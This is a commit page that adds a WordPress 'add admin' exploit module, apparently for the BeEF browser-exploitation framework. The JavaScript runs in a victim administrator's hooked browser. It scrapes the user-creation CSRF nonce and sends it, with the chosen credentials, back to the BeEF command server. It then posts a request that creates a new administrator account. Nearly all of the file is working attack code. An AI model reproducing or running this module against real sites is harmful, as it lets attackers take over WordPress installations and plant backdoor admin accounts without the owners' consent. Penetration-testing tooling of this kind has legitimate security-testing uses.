added a WP module
This commit is contained in:
Daniel Reece
74
modules/exploits/wordpress_add_admin/command.js
Normal file
74
modules/exploits/wordpress_add_admin/command.js
Normal file
@@ -0,0 +1,74 @@
|
||||
//
|
||||
// Copyright (c) 2015 Daniel Reece - @HBRN8
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }
|
||||
function p(u, b){ x=new XMLHttpRequest(); x.open('POST',u,true); x.setRequestHeader("Content-type","application/x-www-form-urlencoded"); x.send(b); return x.responseText; }
|
||||
/* Kept incase there is a valid reason to use forms over AJAX, I cant think of any.
|
||||
function post(path, params, method) {
|
||||
method = method || "post";
|
||||
var form = document.createElement("form");
|
||||
form.setAttribute("method", method);
|
||||
form.setAttribute("action", path);
|
||||
|
||||
for(var key in params) {
|
||||
if(params.hasOwnProperty(key)) {
|
||||
var hiddenField = document.createElement("input");
|
||||
hiddenField.setAttribute("type", "hidden");
|
||||
hiddenField.setAttribute("name", key);
|
||||
hiddenField.setAttribute("value", params[key]);
|
||||
form.appendChild(hiddenField);
|
||||
}
|
||||
}
|
||||
document.body.appendChild(form);
|
||||
form.submit();
|
||||
}
|
||||
*/
|
||||
|
||||
var domail = '<%= @domail %>';
|
||||
|
||||
page = g("/wp-admin/user-new.php");
|
||||
|
||||
m = page.match(/\-user" value="(.*?)" \/><input/);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "CSRF nonce hijacked = " + m[1] +
|
||||
"\nCreating admin... (<%== format_multiline(@user + ':' + @pass) %>)");
|
||||
|
||||
var blob = "action=createuser" +
|
||||
"&_wpnonce_create-user=" + m[1] +
|
||||
"&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" +
|
||||
"&user_login=<%== format_multiline(@user) %>" +
|
||||
"&email=<%== format_multiline(@email) %>" +
|
||||
"&first_name=<%== format_multiline(@fname) %>" +
|
||||
"&last_name=<%== format_multiline(@lname) %>" +
|
||||
"&url=<%== format_multiline(@url) %>" +
|
||||
"&pass1=<%== format_multiline(@pass) %>" +
|
||||
"&pass2=<%== format_multiline(@pass) %>";
|
||||
if (domail){
|
||||
//Wordpress will mail regardless of param value if it exists.
|
||||
blob = blob + "&send_password=1";
|
||||
}
|
||||
blob = blob + "&role=administrator&createuser=Add+New+User";
|
||||
|
||||
p("/wp-admin/user-new.php", blob);
|
||||
|
||||
/* Still cant think of any.
|
||||
post('/wp-admin/user-new.php',
|
||||
{action: 'createuser',
|
||||
'_wpnonce_create-user': m[1],
|
||||
_wp_http_referer: '%2Fwp-admin%2Fuser-new.php',
|
||||
user_login: '<%== format_multiline(@user) %>',
|
||||
email: '<%== format_multiline(@email) %>',
|
||||
first_name: '<%== format_multiline(@fname) %>',
|
||||
last_name: '<%== format_multiline(@lname) %>',
|
||||
url: '<%== format_multiline(@url) %>',
|
||||
pass1: '<%== format_multiline(@pass) %>',
|
||||
pass2: '<%== format_multiline(@pass) %>',
|
||||
send_password: '1',
|
||||
role: 'administrator',
|
||||
createuser: 'Add+New+User+'});
|
||||
*/
|
||||
|
||||
});
|
||||
Reference in New Issue
Block a user